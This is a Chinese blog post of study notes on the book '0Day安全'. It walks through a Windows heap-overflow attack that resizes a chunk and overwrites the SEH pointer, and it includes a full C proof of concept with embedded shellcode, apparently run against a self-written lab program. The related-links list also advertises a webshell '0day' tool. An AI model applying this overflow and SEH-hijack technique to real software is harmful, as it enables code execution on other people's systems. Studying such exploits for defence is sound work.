记录学习《0Day安全》路上遇到的问题解决方案: 阶段性总结-重重保护下的堆!

最新推荐文章于 2021-11-30 16:30:00 发布
最新推荐文章于 2021-11-30 16:30:00 发布
阅读量620 收藏
点赞数 1
分类专栏: 0day安全学习 文章标签: 安全 0-day
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z_lit0/article/details/71270713
版权 
if __author__ == "lit0":

0x00 前言

转眼学习这本书已经到了第二篇末尾最后一章也是较难的一章,虽然没有碰到什么大问题,不合这个系列标题所说的问题解决方案,但还是写一些自己学习的一些理解,尤其是堆。很有趣啊!
记录一下关于堆的一些理解

0x01正文- 利用chunk重设大小攻击堆

微软对于堆双向链表的释放做了验证(验证释放时前后指针是否指向node而不是被破坏了)
然而并没有对插入进行验证~~,如果h1申请了大小为16的空间,那么堆就会分配空间,形成新的chunk(空闲块),并插入到链表里!!而h1的尾巴就会跟着大空闲块(不理解的看看操作系统),h1溢出(堆溢出)时,就会覆盖后面的空闲块,当块首被覆盖,地址也就被覆盖,这就给了我们机会

这里写图片描述
这里写图片描述

也就是说插入链表的过程中,会导致任意位置写入固定值的漏洞。

2.利用 - 通过dword shoot 向seh写入flink(把flink的地址写入seh),构造成0x003506EB, EB 06 正好是短跳地址,再制造异常,使程序转入执行短跳,在短跳的目的处构造短跳,跳过垃圾值,到达shellcode执行

这里写图片描述
1.eax 指向申请的h1的首部 0x00350688
2.执行完 00401050 处的 memcpy 函数后覆盖下一chunk(空闲块)的首地址,将其伪造成0x003506eb, 执行h2的申请就会将flink的地址写入seh。
这里写图片描述

已经替换成0x003506B8,一旦异常就会转入此地址,执行构造好的 EB 06 构造一个跳转目的地址为一个跳转地址,转入执行shellcode

3.shellcode 如下:

#include <stdio.h>
#include <windows.h>
void main()
{
    char shellcode[]=
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x10\x01\x10\x00\x99\x99\x99\x99"
        "\xEB\x06\x35\x00\xEB\x06\x35\x00"  // 此为新chunk的flink 和 blink,覆盖为EB 06 短跳
        "\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\xEB\x31\x90\x90\x90\x90\x90\x90"  //短跳,跳过下面代码,执行shellcode
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x11\x01\x10\x00\x99\x99\x99\x99"
        "\x8C\x06\x35\x00\xB4\xFF\x12\x00"  // blink 伪造成seh地址
        // 下面是shellcode程序
        "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
        "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
        "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
        "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
        "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
        "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
        "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
        "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
        "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
        "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
        "\x53\xFF\x57\xFC\x53\xFF\x57\xF8";
    HLOCAL h1,h2;
    HANDLE hp;
    hp = HeapCreate(0,0x1000,0x10000); 
    h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
    __asm int 3
    memcpy(h1,shellcode,300);
    h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
    int zero=0;
    zero=1/zero;
    printf("%d",zero);
}

在此设置断点:
这里写图片描述

0x003506B8上的 003506EB

这里写图片描述

短跳至此处:

这里写图片描述

转入shellcode:

这里写图片描述

成功执行

这里写图片描述

lit0
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
价值500元拿webshell的0day.rar
08-01
拿webshell的0day,工具加一些文档,,很好用的工具 分享给大家,大家可以看看
0day安全》——重重保护下的
sunr_的博客
09-01 259
保护方式  1.PEB random:dword shoot写内存,覆盖PEB指针,加入随机化了就不行了。  2.Safe Unlink:验证当前块的下一个块的前向指针和前一个块的后向指针是否指向当前块。  3.heap cookie:跟栈的GS类似,cookie放在segment table处,占一个字节。  4.元数据加密:块首一些重要元素与一个4字节的随机数进行异或运算,使用时再异或回来,我们就不能直接破坏或改写这些数据了。 攻击中存储的变量 中的各项保护措施是对块的关键结构进行保护
一篇文章弄懂暴力拆解safe-unlink
合天网安学院
11-30 308
原创稿件征集邮箱:[email protected]:3200599554黑客极客技术、信息安全热点安全研究分析等安全相关的技术文章稿件通过并发布还能收获200-800元不等的稿酬前言今...
Linux应急响应手册
Master'Blog
01-22 3279
来源:http://secscorpio.top/index.php/%E5%AE%89%E5%85%A8%E4%BD%93%E7%B3%BB%E5%BB%BA%E8%AE%BE/82.html 一个企业的信息安全建设,最基本的无非是要做好三件事:第一件是事前的安全基线,从源头尽可能保证新上线的系统的安全性;第二件是建立事中的监控能力,各种多维度的入侵检测,做到有针对性、及时的救火;第三件是
Windows漏洞利用与防护(2015.8)
weixin_30950237的博客
05-02 747
Windows平台下的漏洞利用与防护 0x00 概述 在过去的二十几年,Windows作为网络安全的主战场之一,攻于防的较量从未停息过。内存破坏漏洞作为研究的重点之一,经历了很多的发展也沉淀了前辈们许多经验和智慧。 本人根据大牛们的各种报告总结了目前Windows平台上内存破坏漏洞利用与防护的发展史,接下来会从应用层和内核层两个方面逐一介绍。 先来看一下总的架构图: 0x01 用户层 应用层漏洞...
0day-安全性-软件-漏洞分析技术:0day安全_软件突破分析技术
02-06
0day-安全性-软件-漏洞分析技术 《 0day安全:软件突破分析技术(第二版)》随书资料包使用注意事项 资料包中资料仅用于学习目的,任何组织,个人,机构不可以任何形式利用资料包中的资料进行商业盈利目的的活动。 ...
Day20-21:周末任务日20-21 !!!!
03-29
第20-21天 周末任务日20-21 !!!!
Day22:day22的任务-竞技场!!!
03-30
第22天day22的任务-竞技场!!!
leetcode2-30-Day-LeetCoding-Challenge:30天LeetCoding-Challenge中每个问题解决方案
06-29
解决方案中的每一个问题 介绍 嗨,大家好! Lockdown 给了我充足的时间来开始解决 Leetcode 上的一些问题。 我已经开始了 30 天 Leetcode 挑战。 作为练习,我还上传了这些问题解决方案(据我所知)。 来吧,看看...
7th-PARTNER-s-DAY:学习吧! 分享它!
04-29
第七届D2校园合作伙伴日到目前为止,已为管理团队举行的“ CAMPUS PARTNER”管理团队会议将在“ CAMPUS PARTNER'S DAY”重新开始,以便您可以与俱乐部成员聚会和交流。 问:发生了什么变化? 参与目标将从管理团队...
重重保护下的
dengyao6547的博客
08-09 94
保护机制的原理   PEB random:在Windows XP SP2之后,将PEB基地址前两个字节随机化。   Safe Unlink:在SP2 之前的链表拆卸操作类似于如下代码:    int remove (ListNode * node)   (     node -> blink->flink = node->flink; ...
关于dedecms的0day漏洞的解决方案(个人见解)
jsglzj的专栏
01-07 1345
dedecms的0day漏洞的问题一直是dedecms用户头疼的问题,尽管官方也出一些漏洞补丁,个人总是觉得不太安全,经过一段时间的研究,总结一个通过设置网站的文件夹权限设置,经过一段时间的试验,效果还是很好。现在分享给大家。 web网站的注入一直各种web程序的一个软肋,特别对开源的而且有大规模应用的代码,一般注入的方式都是通过程序上传、sql注入方式上传webshell程序,从而把恶意代码以
0day安全:软件漏洞分析技术 学习分析记录
giantbranch的专栏
03-02 4268
这本书其实我2015.10就尝试开始看了,看到简单的栈溢出,就看不下去了 主要是当时功力不足,难以坚持下去,兴致也不是很高 当我兴致来了,我觉得我为我的目标必须得看下去 2017.03.02 基本看完,实践完 mark一下 我写在了我的另一个博客上,这里直接给出超链接吧 这个记录是从我第二次看这本书开始,所以前面的就没记录了 第一个缓冲区溢出的全过程实践
安全编码笔记
kernweak的博客
06-14 986
gs security cookie,防止栈溢出,在栈上上放了security cookie,函数退出是会判断是否溢出,yognIDA时候可以看见。 还有就是变量重新排列。 突破方式:未被保护的内存绕过(未大于4字节的缓存默认不开gs),覆盖虚函数突破,SEH攻击突破,替换cookie突破。 safeseh 操作系统编译器双从支持,编译器启用该链接选项后,编译器在编译程序的时候将把所有...
Libc管理机制及漏洞利用技术 (一)
sdulibh的专栏
12-31 2450
0×01 Libc浅析 1.1 管理结构 struct malloc_state {  mutex_t mutex;                 /* Serialize access. */  int flags;                       /* Flags (formerly in max_fast). */  #if THREAD_STATS  /* Sta
漏洞利用原理(高级)
wk19951125的博客
08-29 476
保护保护机制的原理攻击中存储的变量利用chunk重设大小攻击利用Lookaside表进行溢出参考文献 保护机制的原理 微软在中添加的安全校验操作: PEB random Safe Unlink:改写了操作双向链表的代码,在XP SP2后会提前验证块前向指针和后向指针的完整性 Heap Cookie:类似于Security Cookie 元数据加密:块首中的一些重要数据在保存时...
0day安全:软件漏洞分析技术》学习笔记·1(需要补充节部分)
黑夜黎明
06-13 505
基础知识 漏洞概述   通常把这类能够引起软件做一些“超出设计范围的事情”的bug称为漏洞(vulnerability)。   功能性逻辑缺陷(bug):影响软件的正常功能,例如,执行结果错误,图标显示错误   安全性逻辑缺陷(漏洞):通常情况下不影响软件的正常功能,但被攻击者成功利用后,有可能引起软件去执行额外的恶意代码,常见的漏洞包括软件中的缓冲区溢出漏洞、网络中的跨站脚本漏洞(XSS)、SQ...
记录学习0Day安全路上遇到问题解决方案 -- 开发shellcode的艺术!
Z_LiT0的博客
04-18 769
ps: 阅读这本书籍,希望留下点什么~__author__ == "lit0"问题1: jmp esp定位问题描述: jmp esp 是动态执行shellcode的关键,一般的,只需要执行内存任何jmp esp语句就可以跳转到esp指向的地址即shellcode地址使代码执行成功。 下面的代码是载入user32.dll 获取 jmp esp内存地址。# include<stdio.h> # in
Failed to execute goal on project day77_nPortal: Could not resolve dependencies for project com.qf:day77_nPortal:jar:1.0-SNAPSHOT: Could not find artifact com.qf:day77_nService:jar:1.0-SNAPSHOT
最新发布
05-24
你可以检查一下以上几点,排除问题所在。如果你确认依赖配置正确,可以尝试手动安装依赖到本地或者远程仓库中。你可以使用以下命令将依赖安装到本地仓库中: ```bash mvn install:install-file -Dfile=<path-to-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值